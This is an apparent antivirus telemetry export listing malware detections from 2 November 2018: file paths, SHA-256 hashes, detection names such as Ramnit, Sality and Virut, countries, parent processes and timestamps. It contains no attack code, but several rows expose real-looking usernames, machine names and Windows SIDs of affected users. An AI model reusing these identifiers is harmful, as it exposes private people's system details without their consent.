  Row(detection=Row(filename='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9E4E80B760D990D08C455A290A87FBE4D014A3E58547F1300B702324232FD21A', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='9e4e80b760d990d08c455a290a87fbe4d014a3e58547f1300b702324232fd21a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:01:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='C:\\Users\\X\\Downloads\\Autocad2009_minixiazai.com(1)\\cad2009zwpjb\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='9e6c5c9697c88dfcb84830e97babf1fbc63f8c045489538a2444975ee854e01f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe38_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe38 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=297472, timestamp='2018-11-02T20:38:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{3A1F223F-F8CB-4CCA-ACC0-B6B23267C51B} S-1-5-21-2542648671-3618714615-2715966978-1000:Brück-PC\\\\Brück:Interactive:LUA[1]', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:35:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{C6400109-EEBE-4606-AEC6-F49F93BB5F65} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='Adware/OSX.GT3Geeks.pewvs.#M1.#R1'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{E525F0F6-A2F5-4298-8E20-D97F4B7FB9B9} S-1-5-21-3651596969-1277983412-1928224779-1000:mfathy-PC\\\\mfathy:Interactive:[1]', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T12:11:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{2C42A77A-0BF5-4764-9D7F-A845D2E63959} S-1-5-21-2209396420-3330014840-508169338-1000:sandro-STI\\\\sandro:Interactive:Highest[1]', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{AF0AEBDC-1900-49B1-AEC7-7DC465295B24} S-1-5-21-887274040-931539383-1001559527-1000:mahdi-PC\\\\mahdi:Interactive:LUA[1]', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:22:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pinball.exe', filepath='C:\\Program Files\\Windows NT\\Pinball\\pinball.exe', filesize=320000, name='W32/Alman.BB.#M1.#R1'), hash='9e80892a9fcd8f0dd799965683a187a8650f7ce21c653f7fbb36306a09096c4e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='F:\\Software\\Norton AntiVirus\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='9e94ec0106058c1fb2a512bd31e5cd25730dbb93dae4bdba4d2a32bdbb2bf5d2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-02T06:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='F:\\Software\\Norton AntiVirus\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='9e94ec0106058c1fb2a512bd31e5cd25730dbb93dae4bdba4d2a32bdbb2bf5d2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-02T12:37:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='playzth.exe', filepath='C:\\Program Files (x86)\\PlayZTH\\PlayZTH.exe', filesize=9664000, name='HEUR/AGEN.1027942.#M1.#R1'), hash='9eb401544bfbd608b71acb6d99c2b17edcc27d0bebea3b8149a2b407e6d91af3', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:20:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:UCbovtIsukesVsaw.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T05:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='\\\\?\\C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:35:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tcls_core.exe', filepath='\\\\?\\C:\\Program Files\\WeGame\\tcls\\tcls_core.exe', filesize=1124000, name='W32/Sality.AT.#M1.#R1'), hash='9ecc70cccfac22c196ba9658a9971ee4534aa55e5854527c4a81b5baa17b9762', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='procmon.exe', filepath='D:\\ex desktop\\hack\\regmon\\Procmon.exe', filesize=2552000, name='W32/Neshta.A.#M1.#R1'), hash='9edb637c4276cd2a5cff16cfb64dd53ec1c12bb79e30c2e2dcb29ae5136f972f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904296, timestamp='2018-11-02T19:03:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:18:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T13:04:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T20:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T22:02:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T17:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T19:01:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9F3EF947F7082BF578689427E9BE445BB650A727CA3AD8D73E0277C50703630F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\9F3EF947F7082BF578689427E9BE445BB650A727CA3AD8D73E0277C50703630F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='9f3ef947f7082bf578689427e9be445bb650a727ca3ad8d73e0277c50703630f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:44:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar.exe', filepath='C:\\Users\\X\\Desktop\\Eigene Dateien\\Programme\\Crack WinRar 2.60d\\winrar.exe', filesize=640000, name='TR/Crypt.XPACK.Gen8.#M300.#R700824'), hash='9f711219b81861395b3cc5498306ae915229d39c3fbc31866edb483ee150076e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:37:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:35:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:54:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:47:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:06:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:07:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:30:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:55:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:38:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:22:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smuninstall.exe', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\files\\fpkdeshirgxikjcxdpteiqwokghhiscx\\GNUpdate\\SMUninstall.exe', filesize=384000, name='PUA/SearchModule.Gen.#M300.#R7600'), hash='9fcfd14a07cc0801d324c4022767ba1ed9638d864d4380d4dd375b44f41d78cf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grim-qt-v1.2.1.exe', filepath='h:\\grim-qt-v1.2.1.exe', filesize=24896000, name='SPR/Agent.9fdf39.#M1.#R1'), hash='9fdf3947705b39ed43f38747463992c3668cae612340049c71f4b4a630f12f51', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T12:44:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a035493e565a4d236e004f6c4313186bbe1b8a528d9093031e5e4387249d9bbd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A035493E565A4D236E004F6C4313186BBE1B8A528D9093031E5E4387249D9BBD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a035493e565a4d236e004f6c4313186bbe1b8a528d9093031e5e4387249d9bbd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tprecvfs5_01085.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Testing Program 2016 Cloud\\Visor\\Flash\\TPRECVFS5_01085.exe', filesize=428000, name='HEUR/APC.#M1.#R1'), hash='a0715f512395dc908b5be78ac756ca1350e64d4c0a9389a9866403a3c5115bd7', metadata=Row(cmdline=None, country='SV', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T01:28:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\AppData\\Roaming\\.minecraft\\versions\\1.12.2\\natives\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='a07e68babafa39418d8738a4030b3a7b0548c5d145c128299f41be269dd40d3c', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe', parentsize=2552312, timestamp='2018-11-02T21:34:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='a0b9a85795a590e74f4bb5f961ec00c0c07978d47ef69ce10efc676ab22331fe', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T08:30:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eularesde_de.dll', filepath='D:\\soft\\Adobe photoshop cs2\\AutoPlay\\eularesde_DE.dll', filesize=156000, name='W32/Ramnit.C.#M0.#R0'), hash='a11438dab887556005154755508239756d448b40f3903566fc6c4083ba12ec55', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a12e6202d3f845ccb75506dd221708ba02df20de86bbdb03824bebba4c8e1f82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-29\\A12E6202D3F845CCB75506DD221708BA02DF20DE86BBDB03824BEBBA4C8E1F82', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='a12e6202d3f845ccb75506dd221708ba02df20de86bbdb03824bebba4c8e1f82', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:28:41Z'), dt=datetime.date(2018, 11, 2)),
